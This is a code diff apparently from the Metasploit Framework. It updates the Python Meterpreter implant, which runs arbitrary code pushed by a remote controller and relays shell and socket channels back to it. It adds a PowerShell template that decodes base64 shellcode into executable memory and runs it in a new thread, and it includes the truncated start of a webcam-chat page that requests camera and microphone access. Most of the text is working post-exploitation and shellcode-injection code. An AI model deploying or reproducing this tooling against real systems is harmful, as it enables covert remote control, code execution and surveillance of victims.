Flags = (GAA_FLAG_INCLUDE_PREFIX | GAA_FLAG_SKIP_DNS_SERVER | GAA_FLAG_SKIP_MULTICAST | GAA_FLAG_SKIP_ANYCAST)
|
||||||
|
AdapterAddresses = ctypes.c_void_p()
|
||||||
|
SizePointer = ctypes.c_ulong()
|
||||||
|
SizePointer.value = 0
|
||||||
|
iphlpapi.GetAdaptersAddresses(socket.AF_UNSPEC, Flags, None, AdapterAddresses, ctypes.byref(SizePointer))
|
||||||
|
AdapterAddressesData = (ctypes.c_uint8 * SizePointer.value)()
|
||||||
|
iphlpapi.GetAdaptersAddresses(socket.AF_UNSPEC, Flags, None, ctypes.byref(AdapterAddressesData), ctypes.byref(SizePointer))
|
||||||
|
AdapterAddresses = ctypes.string_at(ctypes.byref(AdapterAddressesData), SizePointer.value)
|
||||||
|
AdapterAddresses = cstruct_unpack(IP_ADAPTER_ADDRESSES, AdapterAddresses)
|
||||||
|
if AdapterAddresses.u.s.Length <= 72:
|
||||||
|
return stdapi_net_config_get_interfaces_via_windll_mib()
|
||||||
|
win_version = windll_GetVersion()
|
||||||
|
interfaces = []
|
||||||
|
pAdapterAddresses = ctypes.byref(AdapterAddresses)
|
||||||
|
while pAdapterAddresses:
|
||||||
|
AdapterAddresses = cstruct_unpack(IP_ADAPTER_ADDRESSES, pAdapterAddresses)
|
||||||
|
pAdapterAddresses = AdapterAddresses.Next
|
||||||
|
pFirstPrefix = AdapterAddresses.FirstPrefix
|
||||||
|
iface_info = {}
|
||||||
|
iface_info['index'] = AdapterAddresses.u.s.IfIndex
|
||||||
|
if AdapterAddresses.PhysicalAddressLength:
|
||||||
|
iface_info['hw_addr'] = ctypes.string_at(ctypes.byref(AdapterAddresses.PhysicalAddress), AdapterAddresses.PhysicalAddressLength)
|
||||||
|
iface_info['name'] = str(ctypes.wstring_at(AdapterAddresses.Description))
|
||||||
|
iface_info['mtu'] = AdapterAddresses.Mtu
|
||||||
|
pUniAddr = AdapterAddresses.FirstUnicastAddress
|
||||||
|
while pUniAddr:
|
||||||
|
UniAddr = cstruct_unpack(IP_ADAPTER_UNICAST_ADDRESS, pUniAddr)
|
||||||
|
pUniAddr = UniAddr.Next
|
||||||
|
address = cstruct_unpack(SOCKADDR, UniAddr.Address.lpSockaddr)
|
||||||
|
if not address.sa_family in (socket.AF_INET, socket.AF_INET6):
|
||||||
|
continue
|
||||||
|
prefix = 0
|
||||||
|
if win_version.dwMajorVersion >= 6:
|
||||||
|
prefix = UniAddr.OnLinkPrefixLength
|
||||||
|
elif pFirstPrefix:
|
||||||
|
ip_adapter_prefix = 'QPPIL'
|
||||||
|
prefix_data = ctypes.string_at(pFirstPrefix, struct.calcsize(ip_adapter_prefix))
|
||||||
|
prefix = struct.unpack(ip_adapter_prefix, prefix_data)[4]
|
||||||
|
iface_addresses = iface_info.get('addrs', [])
|
||||||
|
if address.sa_family == socket.AF_INET:
|
||||||
|
iface_addresses.append((socket.AF_INET, ctypes.string_at(ctypes.byref(address.sa_data), 6)[2:], prefix))
|
||||||
|
else:
|
||||||
|
iface_addresses.append((socket.AF_INET6, ctypes.string_at(ctypes.byref(address.sa_data), 22)[6:], prefix))
|
||||||
|
iface_info['addrs'] = iface_addresses
|
||||||
|
interfaces.append(iface_info)
|
||||||
|
return interfaces
|
||||||
|
|
||||||
|
def stdapi_net_config_get_interfaces_via_windll_mib():
|
||||||
|
iphlpapi = ctypes.windll.iphlpapi
|
||||||
|
table = (ctypes.c_uint8 * (ctypes.sizeof(MIB_IPADDRROW) * 33))()
|
||||||
|
pdwSize = ctypes.c_ulong()
|
||||||
|
pdwSize.value = ctypes.sizeof(table)
|
||||||
|
if (iphlpapi.GetIpAddrTable(ctypes.byref(table), ctypes.byref(pdwSize), True) != 0):
|
||||||
|
return None
|
||||||
|
interfaces = []
|
||||||
|
table_data = ctypes.string_at(table, pdwSize.value)
|
||||||
|
entries = struct.unpack('I', table_data[:4])[0]
|
||||||
|
table_data = table_data[4:]
|
||||||
|
for i in xrange(entries):
|
||||||
|
addrrow = cstruct_unpack(MIB_IPADDRROW, table_data)
|
||||||
|
ifrow = MIB_IFROW()
|
||||||
|
ifrow.dwIndex = addrrow.dwIndex
|
||||||
|
if iphlpapi.GetIfEntry(ctypes.byref(ifrow)) != 0:
|
||||||
|
continue
|
||||||
|
iface_info = {}
|
||||||
|
table_data = table_data[ctypes.sizeof(MIB_IPADDRROW):]
|
||||||
|
iface_info['index'] = addrrow.dwIndex
|
||||||
|
iface_info['addrs'] = [(socket.AF_INET, struct.pack('<I', addrrow.dwAddr), struct.pack('<I', addrrow.dwMask))]
|
||||||
|
if ifrow.dwPhysAddrLen:
|
||||||
|
iface_info['hw_addr'] = ctypes.string_at(ctypes.byref(ifrow.bPhysAddr), ifrow.dwPhysAddrLen)
|
||||||
|
if ifrow.dwDescrLen:
|
||||||
|
iface_info['name'] = ifrow.bDescr
|
||||||
|
iface_info['mtu'] = ifrow.dwMtu
|
||||||
|
interfaces.append(iface_info)
|
||||||
|
return interfaces
|
||||||
|
|
||||||
@meterpreter.register_function
|
@meterpreter.register_function
|
||||||
def stdapi_net_resolve_host(request, response):
|
def stdapi_net_resolve_host(request, response):
|
||||||
hostname = packet_get_tlv(request, TLV_TYPE_HOST_NAME)['value']
|
hostname = packet_get_tlv(request, TLV_TYPE_HOST_NAME)['value']
|
||||||
|
@ -776,9 +1228,10 @@ def stdapi_net_resolve_hosts(request, response):
|
||||||
|
|
||||||
@meterpreter.register_function
|
@meterpreter.register_function
|
||||||
def stdapi_net_socket_tcp_shutdown(request, response):
|
def stdapi_net_socket_tcp_shutdown(request, response):
|
||||||
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)
|
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
|
||||||
|
how = packet_get_tlv(request, TLV_TYPE_SHUTDOWN_HOW).get('value', socket.SHUT_RDWR)
|
||||||
channel = meterpreter.channels[channel_id]
|
channel = meterpreter.channels[channel_id]
|
||||||
channel.close()
|
channel.shutdown(how)
|
||||||
return ERROR_SUCCESS, response
|
return ERROR_SUCCESS, response
|
||||||
|
|
||||||
@meterpreter.register_function_windll
|
@meterpreter.register_function_windll
|
||||||
|
|
Binary file not shown.
Binary file not shown.
|
@ -1,6 +1,12 @@
|
||||||
#!/usr/bin/python
|
#!/usr/bin/python
|
||||||
import code
|
import code
|
||||||
|
try:
|
||||||
import ctypes
|
import ctypes
|
||||||
|
except:
|
||||||
|
has_windll = False
|
||||||
|
else:
|
||||||
|
has_windll = hasattr(ctypes, 'windll')
|
||||||
|
|
||||||
import os
|
import os
|
||||||
import random
|
import random
|
||||||
import select
|
import select
|
||||||
|
@ -10,8 +16,6 @@ import subprocess
|
||||||
import sys
|
import sys
|
||||||
import threading
|
import threading
|
||||||
|
|
||||||
has_windll = hasattr(ctypes, 'windll')
|
|
||||||
|
|
||||||
#
|
#
|
||||||
# Constants
|
# Constants
|
||||||
#
|
#
|
||||||
|
@ -73,6 +77,7 @@ TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
|
||||||
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
|
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
|
||||||
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
|
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
|
||||||
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
|
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
|
||||||
|
TLV_TYPE_CHANNEL_PARENTID = TLV_META_TYPE_UINT | 55
|
||||||
|
|
||||||
TLV_TYPE_SEEK_WHENCE = TLV_META_TYPE_UINT | 70
|
TLV_TYPE_SEEK_WHENCE = TLV_META_TYPE_UINT | 70
|
||||||
TLV_TYPE_SEEK_OFFSET = TLV_META_TYPE_UINT | 71
|
TLV_TYPE_SEEK_OFFSET = TLV_META_TYPE_UINT | 71
|
||||||
|
@ -89,10 +94,38 @@ TLV_TYPE_MIGRATE_LEN = TLV_META_TYPE_UINT | 403
|
||||||
TLV_TYPE_CIPHER_NAME = TLV_META_TYPE_STRING | 500
|
TLV_TYPE_CIPHER_NAME = TLV_META_TYPE_STRING | 500
|
||||||
TLV_TYPE_CIPHER_PARAMETERS = TLV_META_TYPE_GROUP | 501
|
TLV_TYPE_CIPHER_PARAMETERS = TLV_META_TYPE_GROUP | 501
|
||||||
|
|
||||||
|
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
|
||||||
|
TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501
|
||||||
|
TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
|
||||||
|
TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
|
||||||
|
|
||||||
|
EXPORTED_SYMBOLS = {}
|
||||||
|
|
||||||
|
def export(symbol):
|
||||||
|
EXPORTED_SYMBOLS[symbol.__name__] = symbol
|
||||||
|
return symbol
|
||||||
|
|
||||||
def generate_request_id():
|
def generate_request_id():
|
||||||
chars = 'abcdefghijklmnopqrstuvwxyz'
|
chars = 'abcdefghijklmnopqrstuvwxyz'
|
||||||
return ''.join(random.choice(chars) for x in xrange(32))
|
return ''.join(random.choice(chars) for x in xrange(32))
|
||||||
|
|
||||||
|
@export
|
||||||
|
def inet_pton(family, address):
|
||||||
|
if hasattr(socket, 'inet_pton'):
|
||||||
|
return socket.inet_pton(family, address)
|
||||||
|
elif has_windll:
|
||||||
|
WSAStringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA
|
||||||
|
lpAddress = (ctypes.c_ubyte * 28)()
|
||||||
|
lpAddressLength = ctypes.c_int(ctypes.sizeof(lpAddress))
|
||||||
|
if WSAStringToAddress(address, family, None, ctypes.byref(lpAddress), ctypes.byref(lpAddressLength)) != 0:
|
||||||
|
raise Exception('WSAStringToAddress failed')
|
||||||
|
if family == socket.AF_INET:
|
||||||
|
return ''.join(map(chr, lpAddress[4:8]))
|
||||||
|
elif family == socket.AF_INET6:
|
||||||
|
return ''.join(map(chr, lpAddress[8:24]))
|
||||||
|
raise Exception('no suitable inet_pton functionality is available')
|
||||||
|
|
||||||
|
@export
|
||||||
def packet_get_tlv(pkt, tlv_type):
|
def packet_get_tlv(pkt, tlv_type):
|
||||||
offset = 0
|
offset = 0
|
||||||
while (offset < len(pkt)):
|
while (offset < len(pkt)):
|
||||||
|
@ -111,6 +144,7 @@ def packet_get_tlv(pkt, tlv_type):
|
||||||
offset += tlv[0]
|
offset += tlv[0]
|
||||||
return {}
|
return {}
|
||||||
|
|
||||||
|
@export
|
||||||
def packet_enum_tlvs(pkt, tlv_type = None):
|
def packet_enum_tlvs(pkt, tlv_type = None):
|
||||||
offset = 0
|
offset = 0
|
||||||
while (offset < len(pkt)):
|
while (offset < len(pkt)):
|
||||||
|
@ -129,6 +163,7 @@ def packet_enum_tlvs(pkt, tlv_type = None):
|
||||||
offset += tlv[0]
|
offset += tlv[0]
|
||||||
raise StopIteration()
|
raise StopIteration()
|
||||||
|
|
||||||
|
@export
|
||||||
def tlv_pack(*args):
|
def tlv_pack(*args):
|
||||||
if len(args) == 2:
|
if len(args) == 2:
|
||||||
tlv = {'type':args[0], 'value':args[1]}
|
tlv = {'type':args[0], 'value':args[1]}
|
||||||
|
@ -149,6 +184,25 @@ def tlv_pack(*args):
|
||||||
data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
|
data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
|
||||||
return data
|
return data
|
||||||
|
|
||||||
|
#@export
|
||||||
|
class MeterpreterSocket(object):
|
||||||
|
def __init__(self, sock):
|
||||||
|
self.sock = sock
|
||||||
|
|
||||||
|
def __getattr__(self, name):
|
||||||
|
return getattr(self.sock, name)
|
||||||
|
export(MeterpreterSocket)
|
||||||
|
|
||||||
|
#@export
|
||||||
|
class MeterpreterSocketClient(MeterpreterSocket):
|
||||||
|
pass
|
||||||
|
export(MeterpreterSocketClient)
|
||||||
|
|
||||||
|
#@export
|
||||||
|
class MeterpreterSocketServer(MeterpreterSocket):
|
||||||
|
pass
|
||||||
|
export(MeterpreterSocketServer)
|
||||||
|
|
||||||
class STDProcessBuffer(threading.Thread):
|
class STDProcessBuffer(threading.Thread):
|
||||||
def __init__(self, std, is_alive):
|
def __init__(self, std, is_alive):
|
||||||
threading.Thread.__init__(self)
|
threading.Thread.__init__(self)
|
||||||
|
@ -178,6 +232,7 @@ class STDProcessBuffer(threading.Thread):
|
||||||
self.data_lock.release()
|
self.data_lock.release()
|
||||||
return data
|
return data
|
||||||
|
|
||||||
|
#@export
|
||||||
class STDProcess(subprocess.Popen):
|
class STDProcess(subprocess.Popen):
|
||||||
def __init__(self, *args, **kwargs):
|
def __init__(self, *args, **kwargs):
|
||||||
subprocess.Popen.__init__(self, *args, **kwargs)
|
subprocess.Popen.__init__(self, *args, **kwargs)
|
||||||
|
@ -187,6 +242,7 @@ class STDProcess(subprocess.Popen):
|
||||||
self.stdout_reader.start()
|
self.stdout_reader.start()
|
||||||
self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None)
|
self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None)
|
||||||
self.stderr_reader.start()
|
self.stderr_reader.start()
|
||||||
|
export(STDProcess)
|
||||||
|
|
||||||
class PythonMeterpreter(object):
|
class PythonMeterpreter(object):
|
||||||
def __init__(self, socket):
|
def __init__(self, socket):
|
||||||
|
@ -201,10 +257,12 @@ class PythonMeterpreter(object):
|
||||||
|
|
||||||
def register_function(self, func):
|
def register_function(self, func):
|
||||||
self.extension_functions[func.__name__] = func
|
self.extension_functions[func.__name__] = func
|
||||||
|
return func
|
||||||
|
|
||||||
def register_function_windll(self, func):
|
def register_function_windll(self, func):
|
||||||
if has_windll:
|
if has_windll:
|
||||||
self.register_function(func)
|
self.register_function(func)
|
||||||
|
return func
|
||||||
|
|
||||||
def add_channel(self, channel):
|
def add_channel(self, channel):
|
||||||
idx = 0
|
idx = 0
|
||||||
|
@ -235,7 +293,8 @@ class PythonMeterpreter(object):
|
||||||
self.socket.send(response)
|
self.socket.send(response)
|
||||||
else:
|
else:
|
||||||
channels_for_removal = []
|
channels_for_removal = []
|
||||||
channel_ids = self.channels.keys() # iterate over the keys because self.channels could be modified if one is closed
|
# iterate over the keys because self.channels could be modified if one is closed
|
||||||
|
channel_ids = self.channels.keys()
|
||||||
for channel_id in channel_ids:
|
for channel_id in channel_ids:
|
||||||
channel = self.channels[channel_id]
|
channel = self.channels[channel_id]
|
||||||
data = ''
|
data = ''
|
||||||
|
@ -248,7 +307,7 @@ class PythonMeterpreter(object):
|
||||||
data = channel.stderr_reader.read()
|
data = channel.stderr_reader.read()
|
||||||
elif channel.poll() != None:
|
elif channel.poll() != None:
|
||||||
self.handle_dead_resource_channel(channel_id)
|
self.handle_dead_resource_channel(channel_id)
|
||||||
elif isinstance(channel, socket._socketobject):
|
elif isinstance(channel, MeterpreterSocketClient):
|
||||||
while len(select.select([channel.fileno()], [], [], 0)[0]):
|
while len(select.select([channel.fileno()], [], [], 0)[0]):
|
||||||
try:
|
try:
|
||||||
d = channel.recv(1)
|
d = channel.recv(1)
|
||||||
|
@ -258,6 +317,21 @@ class PythonMeterpreter(object):
|
||||||
self.handle_dead_resource_channel(channel_id)
|
self.handle_dead_resource_channel(channel_id)
|
||||||
break
|
break
|
||||||
data += d
|
data += d
|
||||||
|
elif isinstance(channel, MeterpreterSocketServer):
|
||||||
|
if len(select.select([channel.fileno()], [], [], 0)[0]):
|
||||||
|
(client_sock, client_addr) = channel.accept()
|
||||||
|
server_addr = channel.getsockname()
|
||||||
|
client_channel_id = self.add_channel(MeterpreterSocketClient(client_sock))
|
||||||
|
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
|
||||||
|
pkt += tlv_pack(TLV_TYPE_METHOD, 'tcp_channel_open')
|
||||||
|
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, client_channel_id)
|
||||||
|
pkt += tlv_pack(TLV_TYPE_CHANNEL_PARENTID, channel_id)
|
||||||
|
pkt += tlv_pack(TLV_TYPE_LOCAL_HOST, inet_pton(channel.family, server_addr[0]))
|
||||||
|
pkt += tlv_pack(TLV_TYPE_LOCAL_PORT, server_addr[1])
|
||||||
|
pkt += tlv_pack(TLV_TYPE_PEER_HOST, inet_pton(client_sock.family, client_addr[0]))
|
||||||
|
pkt += tlv_pack(TLV_TYPE_PEER_PORT, client_addr[1])
|
||||||
|
pkt = struct.pack('>I', len(pkt) + 4) + pkt
|
||||||
|
self.socket.send(pkt)
|
||||||
if data:
|
if data:
|
||||||
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
|
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
|
||||||
pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_write')
|
pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_write')
|
||||||
|
@ -284,7 +358,9 @@ class PythonMeterpreter(object):
|
||||||
if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
|
if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
|
||||||
return ERROR_FAILURE
|
return ERROR_FAILURE
|
||||||
preloadlib_methods = self.extension_functions.keys()
|
preloadlib_methods = self.extension_functions.keys()
|
||||||
i = code.InteractiveInterpreter({'meterpreter':self, 'packet_enum_tlvs':packet_enum_tlvs, 'packet_get_tlv':packet_get_tlv, 'tlv_pack':tlv_pack, 'STDProcess':STDProcess})
|
symbols_for_extensions = {'meterpreter':self}
|
||||||
|
symbols_for_extensions.update(EXPORTED_SYMBOLS)
|
||||||
|
i = code.InteractiveInterpreter(symbols_for_extensions)
|
||||||
i.runcode(compile(data_tlv['value'], '', 'exec'))
|
i.runcode(compile(data_tlv['value'], '', 'exec'))
|
||||||
postloadlib_methods = self.extension_functions.keys()
|
postloadlib_methods = self.extension_functions.keys()
|
||||||
new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods)
|
new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods)
|
||||||
|
@ -299,7 +375,7 @@ class PythonMeterpreter(object):
|
||||||
|
|
||||||
def _core_channel_open(self, request, response):
|
def _core_channel_open(self, request, response):
|
||||||
channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE)
|
channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE)
|
||||||
handler = 'channel_create_' + channel_type['value']
|
handler = 'channel_open_' + channel_type['value']
|
||||||
if handler not in self.extension_functions:
|
if handler not in self.extension_functions:
|
||||||
return ERROR_FAILURE, response
|
return ERROR_FAILURE, response
|
||||||
handler = self.extension_functions[handler]
|
handler = self.extension_functions[handler]
|
||||||
|
@ -314,7 +390,7 @@ class PythonMeterpreter(object):
|
||||||
channel.close()
|
channel.close()
|
||||||
elif isinstance(channel, subprocess.Popen):
|
elif isinstance(channel, subprocess.Popen):
|
||||||
channel.kill()
|
channel.kill()
|
||||||
elif isinstance(s, socket._socketobject):
|
elif isinstance(channel, MeterpreterSocket):
|
||||||
channel.close()
|
channel.close()
|
||||||
else:
|
else:
|
||||||
return ERROR_FAILURE, response
|
return ERROR_FAILURE, response
|
||||||
|
@ -330,7 +406,7 @@ class PythonMeterpreter(object):
|
||||||
channel = self.channels[channel_id]
|
channel = self.channels[channel_id]
|
||||||
result = False
|
result = False
|
||||||
if isinstance(channel, file):
|
if isinstance(channel, file):
|
||||||
result = channel.tell() == os.fstat(channel.fileno()).st_size
|
result = channel.tell() >= os.fstat(channel.fileno()).st_size
|
||||||
response += tlv_pack(TLV_TYPE_BOOL, result)
|
response += tlv_pack(TLV_TYPE_BOOL, result)
|
||||||
return ERROR_SUCCESS, response
|
return ERROR_SUCCESS, response
|
||||||
|
|
||||||
|
@ -363,7 +439,7 @@ class PythonMeterpreter(object):
|
||||||
self.handle_dead_resource_channel(channel_id)
|
self.handle_dead_resource_channel(channel_id)
|
||||||
if channel.stdout_reader.is_read_ready():
|
if channel.stdout_reader.is_read_ready():
|
||||||
data = channel.stdout_reader.read(length)
|
data = channel.stdout_reader.read(length)
|
||||||
elif isinstance(s, socket._socketobject):
|
elif isinstance(channel, MeterpreterSocket):
|
||||||
data = channel.recv(length)
|
data = channel.recv(length)
|
||||||
else:
|
else:
|
||||||
return ERROR_FAILURE, response
|
return ERROR_FAILURE, response
|
||||||
|
@ -385,7 +461,7 @@ class PythonMeterpreter(object):
|
||||||
self.handle_dead_resource_channel(channel_id)
|
self.handle_dead_resource_channel(channel_id)
|
||||||
return ERROR_FAILURE, response
|
return ERROR_FAILURE, response
|
||||||
channel.stdin.write(channel_data)
|
channel.stdin.write(channel_data)
|
||||||
elif isinstance(s, socket._socketobject):
|
elif isinstance(channel, MeterpreterSocket):
|
||||||
try:
|
try:
|
||||||
l = channel.send(channel_data)
|
l = channel.send(channel_data)
|
||||||
except socket.error:
|
except socket.error:
|
||||||
|
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,27 @@
|
||||||
|
function %{func_get_proc_address} {
|
||||||
|
Param ($%{var_module}, $%{var_procedure})
|
||||||
|
$%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
|
||||||
|
|
||||||
|
return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure}))
|
||||||
|
}
|
||||||
|
|
||||||
|
function %{func_get_delegate_type} {
|
||||||
|
Param (
|
||||||
|
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters},
|
||||||
|
[Parameter(Position = 1)] [Type] $%{var_return_type} = [Void]
|
||||||
|
)
|
||||||
|
|
||||||
|
$%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
|
||||||
|
$%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
|
||||||
|
$%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
|
||||||
|
|
||||||
|
return $%{var_type_builder}.CreateType()
|
||||||
|
}
|
||||||
|
|
||||||
|
[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
|
||||||
|
|
||||||
|
$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
|
||||||
|
[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)
|
||||||
|
|
||||||
|
$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
|
||||||
|
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null
|
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,193 @@
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>webcam_chat</title>
|
||||||
|
<style type="text/css">
|
||||||
|
div.container {
|
||||||
|
position: relative;
|
||||||
|
}
|
||||||
|
|
||||||
|
div.windowa {
|
||||||
|
height: 480px;
|
||||||
|
width: 640px;
|
||||||
|
border-radius: 15px;
|
||||||
|
-moz-border-raidus: 15px;
|
||||||
|
background-color: black;
|
||||||
|
position: absolute;
|
||||||
|
left: 50;
|
||||||
|
padding : 10px;
|
||||||
|
margin-left: auto;
|
||||||
|
margin-right: auto;
|
||||||
|
text-align: center;
|
||||||
|
vertical-align: middle;
|
||||||
|
color: white;
|
||||||
|
}
|
||||||
|
|
||||||
|
div.windowb {
|
||||||
|
height: 180px;
|
||||||
|
width: 200px;
|
||||||
|
border-radius: 15px;
|
||||||
|
-moz-border-raidus: 15px;
|
||||||
|
background-color: #9B9B9B;
|
||||||
|
position: absolute;
|
||||||
|
top: 480;
|
||||||
|
left: 470;
|
||||||
|
padding: 10px;
|
||||||
|
margin-left: auto;
|
||||||
|
margin-right: auto;
|
||||||
|
text-align: center;
|
||||||
|
vertical-align: middle;
|
||||||
|
}
|
||||||
|
|
||||||
|
div.windowc {
|
||||||
|
position: absolute;
|
||||||
|
top: 510;
|
||||||
|
left: 80;
|
||||||
|
height: 150px;
|
||||||
|
width: 380px;
|
||||||
|
color: red;
|
||||||
|
}
|
||||||
|
|
||||||
|
div.footer {
|
||||||
|
position: fixed;
|
||||||
|
bottom: 0;
|
||||||
|
width: 100%;
|
||||||
|
padding: 10px;
|
||||||
|
}
|
||||||
|
|
||||||
|
video.peer {
|
||||||
|
position: absolute;
|
||||||
|
top: 15;
|
||||||
|
left: 10;
|
||||||
|
}
|
||||||
|
|
||||||
|
video.self {
|
||||||
|
position: absolute;
|
||||||
|
top: 5;
|
||||||
|
left: 10;
|
||||||
|
}
|
||||||
|
</style>
|
||||||
|
<script src="=WEBRTCAPIJS="> </script>
|
||||||
|
<script>
|
||||||
|
window.onerror = function(e) {
|
||||||
|
document.getElementById("message").innerHTML = "Error: " + e.toString();
|
||||||
|
}
|
||||||
|
|
||||||
|
window.onload = function() {
|
||||||
|
document.getElementById("message").innerHTML = "Waiting for the session. When the session arrives, you must manually allow the webcam to run in order to join the session."
|
||||||
|
}
|
||||||
|
|
||||||
|
var channel = '=CHANNEL=';
|
||||||
|
var websocket = new WebSocket('ws://=SERVER=');
|
||||||
|
var inSession = false;
|
||||||
|
|
||||||
|
websocket.onopen = function() {
|
||||||
|
websocket.push(JSON.stringify({
|
||||||
|
open: true,
|
||||||
|
channel: channel
|
||||||
|
}));
|
||||||
|
};
|
||||||
|
|
||||||
|
websocket.push = websocket.send;
|
||||||
|
websocket.send = function(data) {
|
||||||
|
websocket.push(JSON.stringify({
|
||||||
|
data: data,
|
||||||
|
channel: channel
|
||||||
|
}));
|
||||||
|
};
|
||||||
|
|
||||||
|
var peer = new PeerConnection(websocket);
|
||||||
|
peer.onUserFound = function(userid) {
|
||||||
|
if (inSession) {
|
||||||
|
console.debug("Already in session, will not send another participation request");
|
||||||
|
return;
|
||||||
|
};
|
||||||
|
|
||||||
|
userid = "=OFFERERID=";
|
||||||
|
|
||||||
|
getUserMedia(function(stream) {
|
||||||
|
peer.addStream(stream);
|
||||||
|
peer.sendParticipationRequest(userid);
|
||||||
|
inSession = true;
|
||||||
|
document.getElementById("message").innerHTML = "Session is now active.";
|
||||||
|
});
|
||||||
|
};
|
||||||
|
|
||||||
|
peer.onStreamAdded = function(e) {
|
||||||
|
var video = e.mediaElement;
|
||||||
|
if (e.userid == 'self') {
|
||||||
|
video.controls = true;
|
||||||
|
video.setAttribute('width', 200);
|
||||||
|
video.setAttribute('height', 190);
|
||||||
|
video.setAttribute('controls', false);
|
||||||
|
video.setAttribute('class', 'self');
|
||||||
|
document.getElementById("windowb").appendChild(video);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
video.controls = true;
|
||||||
|
video.setAttribute('width', 640);
|
||||||
|
video.setAttribute('height', 460);
|
||||||
|
video.setAttribute('controls', false);
|
||||||
|
video.setAttribute('class', 'peer');
|
||||||
|
document.getElementById("windowa").appendChild(video);
|
||||||
|
}
|
||||||
|
video.muted = false;
|
||||||
|
video.volume = 0.5;
|
||||||
|
video.play();
|
||||||
|
};
|
||||||
|
|
||||||
|
peer.onStreamEnded = function(e) {
|
||||||
|
var video = e.mediaElement;
|
||||||
|
if (video) {
|
||||||
|
video.style.opacity = 0;
|
||||||
|
setTimeout(function() {
|
||||||
|
video.parentNode.removeChild(video);
|
||||||
|
}, 1000);
|
||||||
|
}
|
||||||
|
document.getElementById("message").innerHTML = "The video session has ended.";
|
||||||
|
};
|
||||||
|
|
||||||
|
function getUserMedia(callback) {
|
||||||
|
|
||||||
|
var hints = {audio:true,video:{
|
||||||
|
optional: [],
|
||||||
|
mandatory: {
|
||||||
|
minWidth: 1280,
|
||||||
|
minHeight: 720,
|
||||||
|
maxWidth: 1920,
|
||||||
|
maxHeight: 1080,
|
||||||
|
minAspectRatio: 1.77
|
||||||
|
}
|
||||||
|
}};
|
||||||
|
|
||||||
|
navigator.getUserMedia(hints,function(stream) {
|
||||||
|
